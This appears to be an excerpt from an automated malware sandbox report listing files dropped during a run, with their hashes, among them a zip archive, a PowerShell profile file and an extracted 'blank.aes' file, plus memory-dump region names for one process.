C:\Users\Admin\AppData\Local\Temp\ \System\Task List.txt
| MD5 | f197ef2507482817c526e67653546f89 |
| SHA1 | 2afaaca068b9152f365d8672ff22d2b71f4334c8 |
| SHA256 | 3891c53f9031420027f37acb2ee3bff63d510fd02f546d4ec30ba79fc8df52a6 |
| SHA512 | e8595d26e7db9f29e72bda1e142efc84fc8a1c51662544f71ecf6dbd41548cdc50ff3384738bc02805d2b3cb649e130f9368df22637c176e04226be0d85f85e2 |
C:\Users\Admin\AppData\Local\Temp\geNAr.zip
| MD5 | 8c97e7ad5a8ef7ac029d7b5a24f93f99 |
| SHA1 | 41b89f6eb37a5e29f79a5544cbc3c84d77f472e8 |
| SHA256 | 9675b4f3b289982dd4545a6dcc8ccc1d87fc187c3afe29846ef0939b22fc5b09 |
| SHA512 | edfa914528209e2ea48dcab91cf45cf0f3082a5b02e689093baa1cb406e742a700c309f5da2bb95878f84f4d8b821a9ebc493b29aeedf05f9d5123bb1c1d55f4 |
memory/212-176-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-184-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp
memory/212-189-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp
memory/212-186-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp
memory/212-175-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
memory/212-185-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/212-212-0x00007FF9EBCB0000-0x00007FF9EC2A2000-memory.dmp
memory/212-236-0x00007FF9EAF40000-0x00007FF9EB00D000-memory.dmp
memory/212-237-0x00007FF9EAA10000-0x00007FF9EAF39000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI49922\blank.aes
| MD5 | 4ee0a30fb1d788c9434d7610d7c3031c |
| SHA1 | 0bcc1d2897d3d4da3f944fd7150d0110178f29fc |
| SHA256 | 7535b2a2d8d883d4472edaeb3724853396a77243efdc679d81da5d61e87bfaab |
| SHA512 | c836ad8ab66d972b40bf31a4b7d34b62ce48baf0c3f45e6c039363acb44e04a9201fa78c74c0b536f5dad67610b1365291f2c40ef70afa7a76d013c3a4819c0b |
memory/212-235-0x00007FF9ECA00000-0x00007FF9ECA33000-memory.dmp
memory/212-234-0x00007FF9FDA50000-0x00007FF9FDA5D000-memory.dmp
memory/212-233-0x00007FF9FB000000-0x00007FF9FB019000-memory.dmp
memory/212-232-0x00007FF9EB5D0000-0x00007FF9EB74E000-memory.dmp
memory/212-231-0x00007FF9FB020000-0x00007FF9FB043000-memory.dmp
memory/212-230-0x00007FF9FB0D0000-0x00007FF9FB0E9000-memory.dmp
memory/212-229-0x00007FF9FB0F0000-0x00007FF9FB11D000-memory.dmp
memory/212-228-0x00007FFA00EE0000-0x00007FFA00EEF000-memory.dmp
memory/212-227-0x00007FFA00170000-0x00007FFA00194000-memory.dmp
memory/212-226-0x00007FF9EB820000-0x00007FF9EB93C000-memory.dmp
memory/212-225-0x00007FF9FD960000-0x00007FF9FD96D000-memory.dmp
memory/212-224-0x00007FF9FA620000-0x00007FF9FA634000-memory.dmp